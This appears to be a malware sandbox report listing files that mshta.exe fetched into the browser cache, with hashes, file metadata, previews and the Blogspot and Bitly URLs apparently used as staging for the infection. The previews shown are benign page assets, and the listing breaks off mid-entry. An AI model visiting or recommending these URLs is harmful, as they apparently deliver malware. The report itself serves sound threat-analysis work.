                                                                                                                                                                                                            Preview: <html>.<head><title>Bitly</title></head>.<body><a href="https://mainjigijigi123.blogspot.com/p/st2222.html">moved here</a></body>.</html>
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\error[1]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\error[2]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ghostbackup13[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):30345
                                                                                                                                                                                                            Entropy (8bit):5.38968098341023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ms+0q2o35xCHMsV1oHHXfPWdT7ELLAZuSXn7bF3peggwjLFjjW82SHdllsmR/8d:ZE3eyHHvPWdcLLAZuSXnVggt72SHU
                                                                                                                                                                                                            MD5:48245C14CB5FABC9DE13624D15960409
                                                                                                                                                                                                            SHA1:43C4EFD1E023A67E41CB247144EEFD77845720DB
                                                                                                                                                                                                            SHA-256:97E1F2201FE9E16C0B60857431C3D90377DA98C829C6E7A3A3F0F8F760DD7ED8
                                                                                                                                                                                                            SHA-512:62E6A7AF042B03E9ABEF036046242E1E0B9F9E68343028EAD60C424C8474502E4D1AEA4826247B726BBFFD42787279EDF5F1008408826028A9513B01FE426874
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://ghostbackbone123.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://ghostbackbone123.blogspot.com/p/ghostbackup13.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="ghostbackbone - Atom" href="https://ghostbackbone123.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="ghostbackbone - RSS" href="https://ghostbackbone123.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="ghostbackbone - Atom" href="https://www.blogger.com/feeds/1690726786805467605/posts/default" />. [if IE]><script t
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\st2[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):33738
                                                                                                                                                                                                            Entropy (8bit):5.52621033813305
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:kI3eyHHvPWdWj0S2vc26nJo6iXnVgMNG2SGo:kI3LHH2dWj72ZKJo6GgMNS
                                                                                                                                                                                                            MD5:4471AED27F6F7476F83FF74C5AA21822
                                                                                                                                                                                                            SHA1:11F39F288AF421327BBC9E8E573503B1A22905CE
                                                                                                                                                                                                            SHA-256:F99248B36DEDF11DCB731D26CACE0C77C3B6E3FA630D78F84D13BC88B8217333
                                                                                                                                                                                                            SHA-512:4E90688AF855311A24AA469006098A5B7B7ABF5140CF315C98384089A7AA554F77081E86809B9E850C44188F9E042728C18DB99756DB1B388896EE047D2807B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://randikhanaekminar.blogspot.com/p/st2.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en-GB'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://randikhanaekminar.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://randikhanaekminar.blogspot.com/p/st2.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="randiblog - Atom" href="https://randikhanaekminar.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="randiblog - RSS" href="https://randikhanaekminar.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="randiblog - Atom" href="https://www.blogger.com/feeds/4778963473423104316/posts/default" />. [if IE]><script type="text/javas
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\3416767676-css_bundle_v2[1].css
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):36990
                                                                                                                                                                                                            Entropy (8bit):5.156709527997923
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:B0OhFvg3AwN6VysImDyPWquJMpx/SCYW0bS8+Rl9yapwuJ86YKSQCNL/J69nag9N:B0Oh+/N6nIm6IvW0ErVJwxgngRdFr2
                                                                                                                                                                                                            MD5:0BEF7C3D549CA15E5FE23315FC211990
                                                                                                                                                                                                            SHA1:28E3A4693A8F0212850A38303A037A6DDBC14D2E
                                                                                                                                                                                                            SHA-256:C91AFADBE63DD834AAC00B49BC715795DA58970E7D500C4BD8F50ED713C77880
                                                                                                                                                                                                            SHA-512:6A255013A987FFFAE23B8AF3A19471CBC4E51F747F41E1341596829FB3316B74882B43F281A9F0741FAEC345F92C6A784EE6C9BEB28D23F211D099D32C597961
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
                                                                                                                                                                                                            Preview: body{margin:0;padding:0 0 1px}.content-outer,.header-outer,.tabs-outer,.main-outer,.main-inner,.footer-outer,.post,.comments,.widget,.date-header,.inline-ad{position:relative;min-height:0;_position:static;_height:1%}.footer-outer{margin-bottom:-1px}.content-inner{padding:10px}.tabs-inner{padding:0 15px}.main-inner{padding:30px 0}.main-inner .column-center-inner,.main-inner .column-left-inner,.main-inner .column-right-inner{padding:0 15px}.footer-inner{padding:30px 15px}.section{margin:0 15px}.widget{margin:30px 0;_margin:0 0 10px}.section:first-child .widget:first-child{margin-top:0}.section:first-child #uds-searchControl+.widget{margin-top:0}.section:last-child .widget:last-child{margin-bottom:0}.tabs:first-child .widget{margin-bottom:0}body .navbar{height:30px;padding:0;margin:0}body .navbar .Navbar{position:absolute;z-index:10;left:0;width:100%;margin:0;padding:0;background:none;border:none}.header-inner .section{margin:0}.header-inner .widget{margin-left:30px;margin-right:30px}.hea
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\84067855-widgets[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):144902
                                                                                                                                                                                                            Entropy (8bit):5.570242774242284
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sf0jKyeUNEWa9MW7zShH4CUMFvkcPe611Cg3x6sMuXgktbdrvh/0ie2zKQ+TtY7g:SnU4CXNew1Cox8210ipOz4m
                                                                                                                                                                                                            MD5:63642B890AD1CBD4C33DF076775147A8
                                                                                                                                                                                                            SHA1:501936F025C1D9F1EA5401E9743632C6C1284A71
                                                                                                                                                                                                            SHA-256:A44D152363BB65AFA637F41D115A093D8E268958D7B69B379A5D205291ADA5C4
                                                                                                                                                                                                            SHA-512:3E895BE361F4EB95C073D284D81D88EC9D40FA66E87797DB38FAC162CDBBA1FBD256B436F738C5D60612C62CEBEA4DB84B2392BDE0D5FF1167B4BAD10F8D59CF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/widgets/84067855-widgets.js
                                                                                                                                                                                                            Preview: (function(){var aa="&action=",ca=".wikipedia.org",da="CSSStyleDeclaration",ea="Clobbering detected",fa="Edge",ha="Element",ia="GET",ja="Never attached to DOM.",ka="SPAN",la="STYLE",ma="SW_READER_LIST_",na="SW_READER_LIST_CLOSED_",oa="Share this post",pa="Symbol.iterator",qa="_blank",ra="about:invalid#zClosurez",sa="about:invalid#zSoyz",ta="attributes",ua="block",va="chooseWidget",wa="click",xa="collapsed",ya="collapsed-backlink",za="collapsible",Aa="comment-editor",Ba="complete",Ca="configure",Da="contact-form-email",.Ea="contact-form-email-message",Fa="contact-form-error-message",Ga="contact-form-error-message-with-border",Ha="contact-form-name",Ia="contact-form-submit",Ja="contact-form-success-message",Ka="contact-form-success-message-with-border",La="data-height",Ma="data-sanitizer-",Na="data-viewurl",Oa="displayModeFull",Pa="displayModeLayout",Qa="displayModeNone",k="div",Ra="dropdown-toggle",Sa="error",Ta="expanded",Ua="expanded-backlink",Va="followers-grid",l="function",Wa="getAt
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):284
                                                                                                                                                                                                            Entropy (8bit):7.171132079129412
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XtZVGhY/4DPyA6kj0VRCi74U13+4LqpQOBdxgUnF68/:XchY/xAdUCc4U1GO6rgUnh/
                                                                                                                                                                                                            MD5:730697C689F5C37C8441656B65C65F91
                                                                                                                                                                                                            SHA1:24C701AEA86212CECE66DD7DD26B3FBD88A93682
                                                                                                                                                                                                            SHA-256:908C6760208DE411D85137226ACDC8AD5F061B9700BD55174EABEDFA558F5940
                                                                                                                                                                                                            SHA-512:2C2B4DB1ECA0023D19DE1D5ED4534D26247EDA71BC9B75581FABE4306BDF23802C37A35BECA2FCF6218236574F4B3021959AE1AC091419AE4FAEF072E2528B88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...........QAN.0....VP9..8@.*%)EJU....i.8F...F...7....zf.0..l.l.....2...N.....T.....%."\...~~.W.C..l."..w>.w..7.k.8......^....A..d{(7i.zo..cu.`o...Q(..j...Y6P..f.....^..0.B!...KC.j"..;T.eq..Z./).T.bI........z....Ur.............vN.!.].a 0.(k........B............
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[2].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):284
                                                                                                                                                                                                            Entropy (8bit):7.28105912472404
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XtwVpe2C2X8PnE+diknJLyw8w45Mpii0Y9YzgRCe/Xm68RDW1o0uel:XiVw2C2X8PnTYkJLy1/5FJ65/2686oY
                                                                                                                                                                                                            MD5:4D81C371377D85872CDA9F8F8864118F
                                                                                                                                                                                                            SHA1:95F2403317D5A30FFFE85BD92D61198DD5C365B4
                                                                                                                                                                                                            SHA-256:2A76F5F170530C3A66BEA30991EFDCF5F8CFD9C5EE537914F57B39163751E90D
                                                                                                                                                                                                            SHA-512:23FD5C5E74FAFE5A9F164BD30AC54A6276DFC2DD292DFC687B2520A27A06BD5FB831247D9AFB7B481F6C3BB9B52DF1A82B162A1524298A18C6A0DF9C6D0A43B7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ............1O.0.....+..6-..$.Z.R..J.H0...X.}..4....1s.=.}.<.|._.r.o..zh...U..g8....^..,&9..W...Y==....6.2.w><oRe..._..@..t.l$...$._....Y..........@%..@.4...Y5P.Tv...vP\.}..F).'z..R..Ep.....v}...Guj..p2..O/\r;...........ka..'j.}...c'BPg(.. .$&..-x...CRcD)...7.}......
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[3].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):287
                                                                                                                                                                                                            Entropy (8bit):7.22084343721493
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XtQepmZpKCGFa2VIqQAN3kVqoltZ1iOS6O2TCO0yb:XdpmKCGGqnkLptS6O27
                                                                                                                                                                                                            MD5:6D3F23BA12AE1D4D66D2D12AC6F8A9F0
                                                                                                                                                                                                            SHA1:E075FB33FE3072030364CCC455CDC7F0DC752A49
                                                                                                                                                                                                            SHA-256:C75C051D62C1419CA30FF20F17720E0DAB937A71CDC2292C67DB5D33F04F62CC
                                                                                                                                                                                                            SHA-512:0F10F1BDF18384EE755B8FD9581DE65185D3E1C70C3774DB7375C295B049AE46CA217DF58FA921B24057E3AB920D78D1811F1C97684951E57EE99F028BA051C1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...........1O.0.....+..1...I....)U.b$...p,..e;...I\..s.;..<.l.U1.6.b54........Ak.q..)..IF...n.I./.j...u......M.d.;........E.......d./.y.`.#.\..L.D..R.-}.wT.*......L.....}Zk..\.G.L*.................^Kk..k40.O.....Cm....k../.......{.....A\H.:).p..E....a..b.?..#l....
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\blogin[4].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):288
                                                                                                                                                                                                            Entropy (8bit):7.186277559304474
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:XtQeYQIDoZZOJgsGJj8FDMV0nCylJiimLrtqBeCw10bPvg3/tz:XdCMZZObmjy9finLRqBrX+/N
                                                                                                                                                                                                            MD5:FFA6B2FB79EFA27C78F1B8AE7252D22E
                                                                                                                                                                                                            SHA1:62627448338A017F93D49E3D93D506EF617388C9
                                                                                                                                                                                                            SHA-256:E25D0467A39DD17C689F94F2C8697B64FF494AC76F3AD1E3D0E658D748C5D5E7
                                                                                                                                                                                                            SHA-512:721DA29A8A42785A00FD92EE7BA3BBCF32B29EF927A870DCBCBD92297A695AC1151F4432C302F44ADF7C862C7C7C449F26363D1D98EFC82C8DDD0BF07FA18C95
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...........1O.0.....+...i$.HR.4%H.*.#....c....i.'1T,...ww.=YzI..U.H.".N.{bU....'.3..T.I..X$...9l.....P..ip....V........_n.t.Z '.C......\...X..u..0.9.A;K..P@9v.3.g.B!...vR..^..q..B!......b=.k...e...E..4.!Z...c..L...uj..m...Gt]w.....q0...S[+..~.?..u...C......C............
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\cookienotice[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://mainjigijigi123.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\error[1]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/error.dlg
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\analytics[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):47051
                                                                                                                                                                                                            Entropy (8bit):5.516264124030958
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ryOveCSBZfsnt5XqY/yPndFTkoWY3SoavqVy2rlebYUDTJC6g0stZm:ryJNDfs5hYdFTwY3SorSg0su
                                                                                                                                                                                                            MD5:53EE95B384D866E8692BB1AEF923B763
                                                                                                                                                                                                            SHA1:A82812B87B667D32A8E51514C578A5175EDD94B4
                                                                                                                                                                                                            SHA-256:E441C3E2771625BA05630AB464275136A82C99650EE2145CA5AA9853BEDEB01B
                                                                                                                                                                                                            SHA-512:C1F98A09A102BB1E87BFDF825A725B0E2CC1DBEDB613D1BD9E8FD9D8FD8B145104D5F4CACA44D96DB14AC20F2F51B4C653278BFC87556E7F00E48A5FA6231FAD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                            Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var l=this||self,m=function(a,b){a=a.split(".");var c=l;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};var q=function(a,b){for(var c in b)b.hasOwnProperty(c)&&(a[c]=b[c])},r=function(a){for(var b in a)if(a.hasOwnProperty(b))return!0;return!1};var t=/^(?:(?:https?|mailto|ftp):|[^:/?#]*(?:[/?#]|$))/i;var u=window,v=document,w=function(a,b){v.addEventListener?v.addEventListener(a,b,!1):v.attachEvent&&v.attachEvent("on"+a,b)};var x={},y=function(){x.TAGGING=x.TAGGING||[];x.TAGGING[1]=!0};var z=/:[0-9]+$/,A=function(a,b,c){a=a.split("&");for(var d=0;d<a.length;d++){var e=a[d].split("=");if(decodeURIComponent(e[0]).replace(/\+/g," ")===b)return b=e.slice(1).join("="),c?b:decodeURIComponent(b).replace(/\+/g," ")}},D=function(a,b){b&&(b=String(b).toLowerCase());if("p
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\backbone14[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):30326
                                                                                                                                                                                                            Entropy (8bit):5.3810418812269685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:rGgiP/b3eyHHvPWduwH9s0XGHAfXnVgN3NHRvHp7oS2SY9Y:rGgiP/b3LHH2duwH9jXGHAdgN3NHRvHz
                                                                                                                                                                                                            MD5:CD2F00999ED27853590B2EDC1F10A133
                                                                                                                                                                                                            SHA1:176E305E9F63D46A6CB03A368C3E3E6E2365D567
                                                                                                                                                                                                            SHA-256:2F37F073E8861DC2074E7CF310E108E036936468CB4F12A363AAF1FC31BA5B31
                                                                                                                                                                                                            SHA-512:C195FE3BF9FD2332BAC4AB4EBE5772EB8AFFA34E7B6E3F4D984078EF46BDEA9092E61BF07AA11F453D0729350E09DF0420180CE53AC0A8F7E5137131AA3E1D6F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://startthepartyup.blogspot.com/p/backbone14.html
                                                                                                                                                                                                            Preview: <!DOCTYPE html>.<html class='v2' dir='ltr' lang='en-GB'>.<head>.<link href='https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css' rel='stylesheet' type='text/css'/>.<meta content='width=1100' name='viewport'/>.<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>.<meta content='blogger' name='generator'/>.<link href='https://startthepartyup.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>.<link href='https://startthepartyup.blogspot.com/p/backbone14.html' rel='canonical'/>.<link rel="alternate" type="application/atom+xml" title="startthepartyup - Atom" href="https://startthepartyup.blogspot.com/feeds/posts/default" />.<link rel="alternate" type="application/rss+xml" title="startthepartyup - RSS" href="https://startthepartyup.blogspot.com/feeds/posts/default?alt=rss" />.<link rel="service.post" type="application/atom+xml" title="startthepartyup - Atom" href="https://www.blogger.com/feeds/9027821174359424672/posts/default" />. [if IE]><script
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\blogin[1].htm
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149589
                                                                                                                                                                                                            Entropy (8bit):5.572386533241481
